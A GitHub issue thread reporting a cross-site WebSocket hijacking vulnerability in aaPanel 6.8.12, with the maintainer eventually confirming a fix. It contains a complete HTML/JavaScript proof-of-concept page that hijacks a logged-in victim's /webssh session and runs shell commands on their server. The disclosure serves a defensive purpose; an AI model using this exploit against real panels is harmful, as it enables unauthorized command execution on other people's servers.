Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security Vulnerability in aaPanel #74

Closed
ssd-disclosure opened this issue Jun 23, 2021 · 10 comments
Closed

Security Vulnerability in aaPanel #74

ssd-disclosure opened this issue Jun 23, 2021 · 10 comments

Comments

@ssd-disclosure
Copy link

Hi,

I would like to report a security vulnerability in aaPanel

I am not sure this is the right place as its public and visible to all, would you like me to post the details here? or email?

@kahisfz
Copy link

kahisfz commented Jun 23, 2021

Hi,
Please post the details.
Thanks

@ssd-disclosure
Copy link
Author

Affected version:

aaPanel LinuxStable 6.8.12

Affected Versions Assumed:

=6.8.4 to current, information obtained from commit https://sourcegraph.com/github.com/aaPanel/aaPanel/-/commit/5e2cbf9a5cb249d0fb58be09707b3fd73daf286a

Video Demo

https://www.youtube.com/watch?v=CHIs4qXgsuw

Requirements

  1. Knowledge of the IP/FQDN of the aaPanel
  2. Victim has to visit a malicious web site with Firefox (the vuln doesn't work with Chrome)
  3. Victim has to have configured Terminal with at least one host
  4. Victim has to have been logged on to the aaPanel prior to have visited the malicious web site

PoC

Please modify the host URL in line 6 if you want to reproduce the vulnerability locally.

<!DOCTYPE html>
<meta charset="utf-8" />
<title>CSWH Hijacking exploit</title>
<script language="javascript" type="text/javascript">
//CHANGEME
var wsUri = "ws://192.168.15.33:8888/webssh"; //WS URL of the vulnerable app
var output;

//Auth check in https://github.com/aaPanel/aaPanel/blob/aacc0df179147bcd900dd753003e567ea1bc88ee/BTPanel/__init__.py#L233-L234

function init(){
output = document.getElementById("output");
testWebSocket();
}
	  
function testWebSocket(){
websocket = new WebSocket(wsUri, );
websocket.onopen = function(evt) { onOpen(evt) };
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}

function onOpen(evt){ //when the WS is connected, send a message the server
writeToScreen("CONNECTED");
	doSend('{}');
	doSend("cat /etc/issue;whoami;ls -la\n");
}

function onClose(evt){
writeToScreen("DISCONNECTED");
}

function onMessage(evt){ //when recieving a WS message, send it in POST to my server
	writeToScreen("RECIEVED : " + evt.data);
}

function onError(evt){
writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
}

function doSend(message){ //function for sending messages via the WS
writeToScreen("SENT : " + message);
websocket.send(message);
}

function writeToScreen(message){ //function for showing errors and other info
var pre = document.createElement("p");
pre.style.wordWrap = "break-word";
pre.innerHTML = message;
output.appendChild(pre);
}

window.addEventListener("load", init, false);  //when loading the page, execute init()
// creating Websocket --> sending a message --> recieving the response and forward it to our server
</script>

<h2>WebSocket Exploit</h2>
<div id="output"></div>

@ssd-disclosure
Copy link
Author

Hi,

Any plans on addressing this security issue?

@ssd-disclosure
Copy link
Author

Hi,

Any plans on addressing this security vulnerability?

@ssd-disclosure
Copy link
Author

Any plans on addressing this security vulnerability?

@aaPanel
Copy link
Owner

aaPanel commented Aug 6, 2021

Any plans on addressing this security vulnerability?

Thanks for the feedback, We will fix it in the next version

@Liang2580
Copy link

It is expected to be repaired next week

@ITKHMER
Copy link

ITKHMER commented Dec 10, 2021

Has this issue been fixed? Because this issue is still open

@aaPanel
Copy link
Owner

aaPanel commented Dec 11, 2021

This vulnerability has been fixed

@aaPanel aaPanel closed this as completed Dec 11, 2021
@ITKHMER
Copy link

ITKHMER commented Dec 12, 2021

Thank you!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants